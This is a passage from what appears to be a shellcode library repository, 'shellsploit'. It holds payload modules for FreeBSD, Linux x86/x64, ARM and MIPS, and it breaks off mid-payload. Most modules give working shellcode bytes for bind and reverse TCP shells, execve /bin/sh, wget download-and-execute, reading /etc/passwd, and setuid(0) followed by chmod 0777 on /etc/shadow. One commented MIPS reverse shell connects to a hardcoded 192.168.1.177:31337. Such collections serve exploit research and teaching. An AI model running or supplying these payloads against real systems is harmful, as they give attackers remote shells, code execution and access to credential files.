(unsigned char)shellcode[i]); 46 | } 47 | printf("\n"); 48 | } 49 | int main(void) 50 | { 51 | const char ip[] = "127.0.0.1"; 52 | unsigned short port = 1337; 53 | 54 | change_shellcode(ip, port); 55 | print_shellcode(); 56 | 57 | return 0; 58 | } 59 | """ 60 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx86/tcp_bind.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Tosh" 6 | Shellcode.info["name"] = "FreeBSDx86 - tcp_bind shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-748.php", 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"]) 13 | Shellcode.info["payload"] = [ 14 | r"\x31\xc9\xf7\xe1\x51\x40\x50\x40\x50\x50" 15 | r"\xb0\x61\xcd\x80\x96\x52\x66\x68" 16 | + kwargs["lport"] + 17 | r"\x66\x68\x01\x02\x89\xe1\x6a\x10\x51\x56\x50\xb0\x68\xcd" 18 | r"\x80\x31\xc0\xb0\x05\x50\x56\x50\xb0\x6a\xcd\x80\x31\xc0\x50\x50\x56" 19 | r"\x50\xb0\x1e\xcd\x80\x97\x31\xc0\x50\xb0\x02\xcd\x80\x09\xc0\x74\xea" 20 | r"\x31\xc9\x31\xc0\x51\x57\x50\xb0\x5a\xcd\x80\xfe\xc1\x80\xf9\x03\x75" 21 | r"\xf0\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89" 22 | r"\xe1\x52\x51\x53\xb0\x3b\x50\xcd\x80" 23 | 24 | ] 25 | -------------------------------------------------------------------------------- /shellsploit/database/Linux/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/Linux/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/Linux/magic.py: -------------------------------------------------------------------------------- 1 | def merlin( counter): 2 | return r"\x31\xc0\x40\x74"+counter 3 | -------------------------------------------------------------------------------- /shellsploit/database/Linux64/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/Linux64/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/Linux64/bin_shx64.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "d4sh&r" 6 | Shellcode.info["name"] = "Linux/x64 - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/38239/" 9 | ] 10 | Shellcode.info["size"] = 22 11 | Shellcode.info["payload"] = [ 12 | r"\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e" 13 | r"\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24" 14 | r"\xb0\x3b\x0f\x05" 15 | 16 | ] 17 | -------------------------------------------------------------------------------- /shellsploit/database/Linux64/chmod.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/13915/ 2 | 3 | 4 | #Will be rewritten .. 5 | 6 | 7 | """ 8 | /* 9 | Title: Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes 10 | Date: 2010-06-17 11 | Tested: Archlinux x86_64 k2.6.33 12 | 13 | Author: Jonathan Salwan 14 | Web: http://shell-storm.org | http://twitter.com/jonathansalwan 15 | 16 | ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/ 17 | 18 | 19 | 20 | <-- _setuid(0) --> 21 | 400078: 48 31 ff xor %rdi,%rdi 22 | 40007b: 48 31 c0 xor %rax,%rax 23 | 40007e: b0 69 mov $0x69,%al 24 | 400080: 0f 05 syscall 25 | 26 | <-- _chmod("/etc/shadow", 0777) --> 27 | 400082: 48 31 d2 xor %rdx,%rdx 28 | 400085: 66 be ff 01 mov $0x1ff,%si 29 | 400089: 48 bb ff ff ff ff ff mov $0x776f64ffffffffff,%rbx 30 | 400090: 64 6f 77 31 | 400093: 48 c1 eb 28 shr $0x28,%rbx 32 | 400097: 53 push %rbx 33 | 400098: 48 bb 2f 65 74 63 2f mov $0x6168732f6374652f,%rbx 34 | 40009f: 73 68 61 35 | 4000a2: 53 push %rbx 36 | 4000a3: 48 89 e7 mov %rsp,%rdi 37 | 4000a6: 48 31 c0 xor %rax,%rax 38 | 4000a9: b0 5a mov $0x5a,%al 39 | 40 | <-- _exit(0) --> 41 | 4000ab: 0f 05 syscall 42 | 4000ad: 48 31 ff xor %rdi,%rdi 43 | 4000b0: 48 31 c0 xor %rax,%rax 44 | 4000b3: b0 3c mov $0x3c,%al 45 | 4000b5: 0f 05 syscall 46 | */ 47 | 48 | """ 49 | 50 | 51 | 52 | def chmod( file): 53 | 54 | "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05" 55 | "\x48\x31\xd2\x66\xbe\xff\x01\x48\xbb\xff" 56 | "\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xeb" 57 | "\x28\x53\x48\xbb\x2f\x65\x74\x63\x2f\x73" 58 | "\x68\x61\x53\x48\x89\xe7\x48\x31\xc0\xb0" 59 | "\x5a\x0f\x05\x48\x31\xff\x48\x31\xc0\xb0" 60 | "\x3c\x0f\x05"; 61 | 62 | -------------------------------------------------------------------------------- /shellsploit/database/Linux64/readfilex64.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Mr.Un1k0d3r" 6 | Shellcode.info["name"] = "Linux/x64 - file_reader shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-878.php" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = 82 + Shellcode().getsize(kwargs["file"]) 13 | Shellcode.info["payload"] = [ 14 | r"\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31" 15 | r"\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89" 16 | r"\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48" 17 | r"\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01" 18 | r"\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff" 19 | r"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41" 20 | + kwargs["file"] 21 | ] 22 | -------------------------------------------------------------------------------- /shellsploit/database/Linux64/reverse_tcpx64.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Russell Willis" 6 | Shellcode.info["name"] = "Linux/x64 - reverse_tcp shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-857.php", 9 | ] 10 | Shellcode.info["size"] = 118 11 | 12 | def __init__(self, **kwargs): 13 | Shellcode.info["payload"] = [ 14 | r"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" 15 | r"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" 16 | r"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02" 17 | + kwargs["lport"] + 18 | r"\xc7\x44\x24\x04" 19 | + kwargs["host"] + 20 | r"\x48\x89\xe6\x6a\x10" 21 | r"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" 22 | r"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" 23 | r"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" 24 | r"\x5f\x6a\x3b\x58\x0f\x05" 25 | ] 26 | -------------------------------------------------------------------------------- /shellsploit/database/Linux64/tcp_bindx64.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Scorpion" 6 | Shellcode.info["name"] = "Linux/x64 - tcp_bind shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/39151/", 9 | ] 10 | Shellcode.info["size"] = 103 11 | 12 | def __init__(self, **kwargs): 13 | Shellcode.info["payload"] = [ 14 | r"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" 15 | r"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" 16 | r"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02" 17 | + kwargs["lport"] + 18 | r"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05" 19 | r"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31" 20 | r"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59" 21 | r"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48" 22 | r"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" 23 | r"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" 24 | r"\x5f\x6a\x3b\x58\x0f\x05" 25 | ] 26 | -------------------------------------------------------------------------------- /shellsploit/database/Linux86/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/Linux86/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/Linux86/bin_shx86.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Hamza Megahed" 6 | Shellcode.info["name"] = "Linux/x86 - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-827.php" 9 | ] 10 | Shellcode.info["size"] = 23 11 | Shellcode.info["payload"] = [ 12 | r"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" 13 | r"\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" 14 | ] 15 | -------------------------------------------------------------------------------- /shellsploit/database/Linux86/chmod.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "B3mB4m" 6 | Shellcode.info["name"] = "Linux/x86 - chmod shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/37285/" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = 19 + Shellcode().getsize(kwargs["file"]) 13 | Shellcode.info["payload"] = [ 14 | r"\x31\xc0\x50" 15 | + kwargs["file"] + 16 | r"\xb0\x0f\x89\xe3\x66\xb9\xff" 17 | r"\x01\xcd\x80\x31\xc0\x40\xcd\x80" 18 | ] 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /shellsploit/database/Linux86/download.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "B3mB4m" 6 | Shellcode.info["name"] = "Linux86 - download&execute shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/39389/" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = \ 13 | 101 + Shellcode().getsize(kwargs["filename"]) * 2 + Shellcode().getsize([kwargs["url"]]) 14 | Shellcode.info["payload"] = [ 15 | r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74" 16 | r"\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1" 17 | r"\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31" 18 | r"\xc0\x50\xb0\x0f" 19 | + kwargs["filename"] + 20 | r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31" 21 | r"\xc0\x50" 22 | + kwargs["filename"] + 23 | r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd" 24 | r"\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" 25 | + kwargs["url"] + 26 | r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68" 27 | r"\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3" 28 | r"\x52\x51\x53\x89\xe1\xcd\x80" 29 | 30 | ] 31 | -------------------------------------------------------------------------------- /shellsploit/database/Linux86/execc.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Unkown" 6 | Shellcode.info["name"] = "Linux/x86 - exec shellcode" 7 | 8 | def __init__(self, **kwargs): 9 | db = [] 10 | for x in kwargs["execommand"]: 11 | db.append("\\x" + x.encode("hex")) 12 | kwargs["execommand"] = "".join(db) 13 | 14 | Shellcode.info["size"] = 36 + Shellcode().getsize(kwargs["execommand"]) 15 | Shellcode.info["payload"] = [ 16 | r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f" 17 | r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12" 18 | r"\x00\x00\x00" 19 | + kwargs["execommand"] + 20 | r"\x00\x57\x53\x89\xe1\xcd\x80" 21 | ] 22 | 23 | 24 | -------------------------------------------------------------------------------- /shellsploit/database/Linux86/readfilex86.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "B3mB4m" 6 | Shellcode.info["name"] = "Linux/x86 - file_reader shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/37297/" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = 43 + Shellcode().getsize(kwargs["file"]) 13 | Shellcode.info["payload"] = [ 14 | r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" 15 | + kwargs["file"] + 16 | r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0" 17 | r"\x03\x66\xba\xff\x0f\x66\x42\xcd\x80" 18 | r"\x31\xc0\x31\xdb\xb3\x01\xb0\x04\xcd" 19 | r"\x80\x31\xc0\xb0\x01\xcd\x80" 20 | ] 21 | -------------------------------------------------------------------------------- /shellsploit/database/Linux86/reverse_tcpx86.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "xmgv" 6 | Shellcode.info["name"] = "Linux/x86 - reverse_tcp shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/36397/", 9 | "https://xmgv.wordpress.com/2015/02/21/slae-assignment-2-reverse-shell/", 10 | ] 11 | Shellcode.info["size"] = 72 12 | 13 | def __init__(self, **kwargs): 14 | Shellcode.info["payload"] = [ 15 | r"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42" 16 | r"\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0" 17 | r"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" 18 | + kwargs["host"] + 19 | r"\x66\x68" 20 | + kwargs["lport"] + 21 | r"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52" 22 | r"\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1" 23 | r"\x52\x68\x2f\x2f\x73\x68\x68\x2f" 24 | r"\x62\x69\x6e\x89\xe3\xcd\x80" 25 | 26 | ] 27 | 28 | -------------------------------------------------------------------------------- /shellsploit/database/Linux86/tcp_bindx86.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "xmgv" 6 | Shellcode.info["name"] = "Linux/x86 - tcp_bind shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/36398/", 9 | "https://xmgv.wordpress.com/2015/02/19/28/", 10 | ] 11 | 12 | def __init__(self, **kwargs): 13 | Shellcode.info["size"] = 94 + Shellcode().getsize(kwargs["lport"]) 14 | Shellcode.info["payload"] = [ 15 | r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53" 16 | r"\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0" 17 | r"\x66\x43\x52\x66\x68" 18 | + kwargs["lport"] + 19 | r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89" 20 | r"\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89" 21 | r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1" 22 | r"\xcd\x80\x93\x31\xc9\xb1\x02" 23 | r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92" 24 | r"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" 25 | r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80" 26 | 27 | ] 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /shellsploit/database/LinuxARM/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/LinuxARM/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/LinuxARM/bin_sh.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "gunslinger" 6 | Shellcode.info["name"] = "LinuxARM - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-855.php" 9 | ] 10 | Shellcode.info["size"] = 35 11 | Shellcode.info["payload"] = [ 12 | r"\x01\x60\x8f\xe2\x16\xff\x2f\xe1" 13 | r"\x40\x40\x78\x44\x0c\x30" 14 | r"\x49\x40\x52\x40\x0b\x27" 15 | r"\x01\xdf\x01\x27" 16 | r"\x01\xdf\x2f\x2f" 17 | r"\x62\x69\x6e\x2f" 18 | r"\x2f\x73" 19 | r"\x68" 20 | ] 21 | -------------------------------------------------------------------------------- /shellsploit/database/LinuxARM/chmod.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "gunslinger" 6 | Shellcode.info["name"] = "LinuxARM - file_reader shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-853.php" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = 28 + Shellcode().getsize(kwargs["file"]) 13 | Shellcode.info["payload"] = [ 14 | r"\x01\x60\x8f\xe2\x16\xff\x2f\xe1\x78\x46" 15 | r"\x10\x30\xff\x21\xff\x31\x01\x31\x0f\x37" 16 | r"\x01\xdf\x40\x40\x01\x27\x01\xdf" 17 | + kwargs["file"] 18 | 19 | ] 20 | -------------------------------------------------------------------------------- /shellsploit/database/LinuxARM/execc.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Unkown" 6 | Shellcode.info["name"] = "LinuxARM - exec shellcode" 7 | 8 | def __init__(self, **kwargs): 9 | db = [] 10 | for x in kwargs["execommand"]: 11 | db.append("\\x" + x.encode("hex")) 12 | kwargs["execommand"] = "".join(db) 13 | 14 | Shellcode.info["size"] = 36 + Shellcode().getsize(kwargs["execommand"]) 15 | Shellcode.info["payload"] = [ 16 | r"\x01\x30\x8f\xe2\x13\xff\x2f\xe1" 17 | r"\x78\x46\x0a\x30\x01\x90" 18 | r"\x01\xa9\x92\x1a\x0b\x27\x01\xdf" 19 | + kwargs["execommand"] 20 | ] 21 | -------------------------------------------------------------------------------- /shellsploit/database/LinuxARM/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "midnitesnake" 6 | Shellcode.info["name"] = "LinuxARM - reverse_tcp shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-821.php", 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["payload"] = [ 13 | r"\x01\x10\x8F\xE2\x11\xFF\x2F\xE1" 14 | r"\x02\x20\x01\x21\x92\x1a\x0f\x02" 15 | r"\x19\x37\x01\xdf\x06\x1c\x08\xa1" 16 | r"\x10\x22\x02\x37\x01\xdf\x3f\x27" 17 | r"\x02\x21\x30\x1c\x01\xdf\x01\x39\xfb\xd5" 18 | r"\x05\xa0\x92\x1a\x05\xb4\x69\x46" 19 | r"\x0b\x27\x01\xdf\xc0\x46\x02\x00" 20 | + kwargs["lport"] + 21 | r"\x13\x37" 22 | + kwargs["host"] + 23 | r"\x2f\x62\x69\x6e\x2f\x73\x68" 24 | 25 | ] 26 | -------------------------------------------------------------------------------- /shellsploit/database/LinuxMIPS/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/LinuxMIPS/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/LinuxMIPS/bin_sh.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Sanguine" 6 | Shellcode.info["name"] = "LinuxMIPS - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/35868/" 9 | ] 10 | Shellcode.info["size"] = 36 11 | Shellcode.info["payload"] = [ 12 | r"\xff\xff" 13 | r"\x06\x28\xff\xff\xd0" 14 | r"\x04\xff\xff\x05\x28" 15 | r"\x01\x10\xe4\x27\x0f" 16 | r"\xf0\x84\x24\xab\x0f" 17 | r"\x02\x24\x0c\x01\x01\x01" 18 | ] 19 | -------------------------------------------------------------------------------- /shellsploit/database/LinuxMIPS/chmod.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Sang-Min LEE" 6 | Shellcode.info["name"] = "LinuxMIPS - chmod shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/36276/" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = 44 + Shellcode().getsize(kwargs["file"]) 13 | Shellcode.info["payload"] = [ 14 | r"\xff\xff\x06\x28\xff\xff" 15 | r"\xd0\x04\xff\xff\x05\x28" 16 | r"\xb6\x01\x05\x24\x01\x10" 17 | r"\xe4\x27\x1f\xf0\x84\x24" 18 | r"\xaf\x0f\x02\x24\x0c\x01" 19 | r"\x01\x01\xff\xff\x04\x28" 20 | r"\xa1\x0f\x02\x24\x0c\x01" 21 | r"\x01\x01" 22 | + kwargs["file"] 23 | ] 24 | -------------------------------------------------------------------------------- /shellsploit/database/LinuxMIPS/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-860.php 2 | #Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators 3 | 4 | 5 | """ 6 | #Close stdin(0) 7 | slti $a0, $zero, 0xFFFF 8 | li $v0, 4006 9 | syscall 0x42424 10 | 11 | #Close stdout(1) 12 | slti $a0, $zero, 0x1111 13 | li $v0, 4006 14 | syscall 0x42424 15 | 16 | #Close stderr(2) 17 | li $t4, 0xFFFFFFFD #-3 18 | not $a0, $t4 19 | li $v0, 4006 20 | syscall 0x42424 21 | 22 | #Socket Domain - AF_INET (2) 23 | li $t4, 0xFFFFFFFD #-3 24 | not $a0, $t4 25 | #Socket Type - SOCK_STREAM (2 for mips) 26 | not $a1, $t4 27 | #Socket Protocol - 0 28 | slti $a2, $zero, 0xFFFF 29 | #Call socket 30 | li $v0, 4183 31 | syscall 0x42424 32 | 33 | #Move socket return value (v0) to register a0 34 | #V0 must be below 0xFFFF/65535 35 | andi $a0, $v0, 0xFFFF 36 | 37 | #Calling dup three times 38 | #Duplicate FD (stdin) 39 | #Socket returned fd 0 - stdin goes to socket 40 | #----- 41 | #Duplicate FD (stdout) 42 | li $v0, 4041 43 | syscall 0x42424 44 | #Duplicate FD (stderr) 45 | li $v0, 4041 46 | syscall 0x42424 47 | 48 | #Connect sockfd 49 | #Socket FD is already in a0 50 | #----- 51 | #Connect sockaddr 52 | lui $a1, 0x6979 #Port: 53 | ori $a1, 0xFF01 #31337 54 | addi $a1, $a1, 0x0101 55 | sw $a1, -8($sp) 56 | 57 | li $a1, 0xB101A8C0 #192.168.1.177 58 | sw $a1, -4($sp) 59 | addi $a1, $sp, -8 60 | 61 | #Connect addrlen - 16 62 | li $t4, 0xFFFFFFEF #-17 63 | not $a2, $t4 64 | #Call connect 65 | li $v0, 4170 66 | syscall 0x42424 67 | 68 | #Putting /bin/sh onto the stack 69 | lui $t0, 0x6962 #Loading Upper Immediate - ib 70 | ori $t0, $t0,0x2f2f #Bitwise OR Immediate - // 71 | sw $t0, -20($sp) #Store word pointer to command string for execution 72 | # 73 | lui $t0, 0x6873 #Loading Upper Immediate - hs 74 | ori $t0, 0x2f6e #Bitwise OR Immediate - /n 75 | sw $t0, -16($sp) #Store word pointer to command string for execution 76 | # 77 | slti $a3, $zero, 0xFFFF #Putting null (0) onto stack 78 | sw $a3, -12($sp) 79 | sw $a3, -4($sp) 80 | 81 | #execve *filename 82 | addi $a0, $sp, -20 83 | #execve *argv[] 84 | addi $t0, $sp, -20 85 | sw $t0, -8($sp) 86 | addi $a1, $sp, -8 87 | # 88 | addiu $sp, $sp, -20 #Adjusting stack 89 | # 90 | #execve envp[] - 0 91 | slti $a2, $zero, 0xFFFF 92 | #Call execve 93 | li $v0, 4011 94 | syscall 0x42424 95 | 96 | 97 | 98 | # NOTE: Assembled shellcode 99 | 100 | #200 byte Linux MIPS reverse shell shellcode by Jacob Holcomb of ISE 101 | #Connects on 192.168.1.177:31337 102 | stg3_SC = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28" 103 | stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01" 104 | stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01" 105 | stg3_SC += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01" 106 | stg3_SC += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24" 107 | stg3_SC += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20" 108 | stg3_SC += "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf" 109 | stg3_SC += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" 110 | stg3_SC += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf" 111 | stg3_SC += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28" 112 | stg3_SC += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23" 113 | stg3_SC += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28" 114 | stg3_SC += "\xab\x0f\x02\x24\x0c\x09\x09\x01" 115 | 116 | 0x1054: 7969053c lui $a1, 0x6979 117 | 0x1058: 01ffa534 ori $a1, $a1, 0xff01 118 | 0x105c: 0101a520 addi $a1, $a1, 0x101 119 | 0x1060: f8ffa5af sw $a1, -8($sp) 120 | 121 | """ 122 | -------------------------------------------------------------------------------- /shellsploit/database/LinuxMIPS/tcp_bind.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "vaicebine" 6 | Shellcode.info["name"] = "LinuxMIPS - tcp_bind shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-81.php", 9 | ] 10 | Shellcode.info["size"] = 276 11 | 12 | def __init__(self, **kwargs): 13 | Shellcode.info["payload"] = [ 14 | r"\xe0\xff\xbd\x27\xfd\xff\x0e\x24\x27\x20\xc0\x01" 15 | r"\x27\x28\xc0\x01\xff\xff\x06\x28\x57\x10\x02\x24" 16 | 